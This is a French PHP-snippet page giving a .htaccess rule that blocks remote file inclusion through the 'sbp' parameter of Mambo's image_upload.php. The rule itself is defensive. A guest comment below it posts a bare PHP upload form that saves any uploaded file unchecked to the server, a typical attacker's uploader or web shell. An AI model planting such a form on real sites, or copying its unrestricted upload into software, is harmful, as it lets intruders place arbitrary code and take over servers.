Corriger la faille touchant mambo via image_upload.php

  Information

Le CMS mambo peut être victime d'attaque par inclusion de fichiers externes.

La prise de contrôle de votre site en est le but ultime.

Le script concerné est image_upload.php avec un paramèyre sbp.

Cette petite règle dans le fichier .htaccess vous protégera car il renverra un code 403 (accès interdit) aux hackers.

  code source classé dans  .HTACCESS ANTI HACK  Copier  

01       02       03       04       05       06       07       08       09       10       11       12       13       14       15       16      /* Titre : Corriger la faille touchant mambo via image_upload.php URL : https://phpsources.net/code_s.php?id=784 Auteur : Forty Website auteur : http://www.toplien.fr/ Date édition : 15 Juin 2008 Date mise a jour : 18 Aout 2019 Rapport de la maj: - fonctionnement du code vérifié */ /*---------------------------------------------------------------*/?> RewriteCond %{QUERY_STRING} ^(.*&)?sbp=http:// RewriteRule ^(.*/)?components/com_simpleboard/image_upload\.php$ - [F,L]

  Poster  

   Un petit merci aux éditeurs pour leur travail ne coûte rien et ça leur fait toujours plaisir

[1]

• 

  Invité

  28 Fév 2015 à 01:37

  <head>

  
  

  <style>

  
  

  <!--

  
  

  p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}-->

  
  

  </style>

  
  

  </head>

  
  

   

  
  

  <table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="1" width="100%" bgcolor="#000000" bordercolorlight="#c0c0c0" border="1">

  
  

  <tr>

  
  

  <a bookmark="minipanel" style="font-weight: normal; color: #009900; font-family: verdana; text-decoration: none">

  
  

  <td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">

  
  

  <center>Upload<form method="POST" enctype="multipart/form-data">

  
  

  <input type="hidden" name="act" value="upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900">

  
  

  <input type="file" name="userfile" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900"><input type="hidden" name="miniform" value="1" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900">

  
  

  <input type="submit" name="submit" value="Upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900"><br><br>

  
  

  <?php

  
  

  $uploaddir = "";

  
  

  $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

  
  

   

  
  

  if (isset($_FILES['userfile']['name'])) {

  
  

          if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {

  
  

                  echo "The file ". basename($_FILES['userfile']['name']) ." has been uploaded";

  
  

          } else {

  
  

                  echo "There was an error uploading the file. please try again!";

  
  

          }

  
  

  }

  
  

  ?>

  
  

  </form>

  
  

  </center></td>

  
  

  </tr>

  
  

  </table>

  
  

  </a>

PHPBoost 6.0.3

Langue
Date	aujourd'hui
Taille	11 Mo
Catégorie	CMS

PhpMyChat 1.99

Langue
Date	aujourd'hui
Taille	7 Mo
Catégorie	Chat

Cmsmadesimple 2.2.22

Langue
Date	aujourd'hui
Taille	5 Mo
Catégorie	CMS

PluXml 5.8.22

Langue
Date	aujourd'hui
Taille	1 Mo
Catégorie	CMS

SPIP 4.4.10

Langue
Date	aujourd'hui
Taille	9 Mo
Catégorie	CMS

PmWiki 2.5.6

Langue
Date	aujourd'hui
Taille	0.67 Mo
Catégorie	Wiki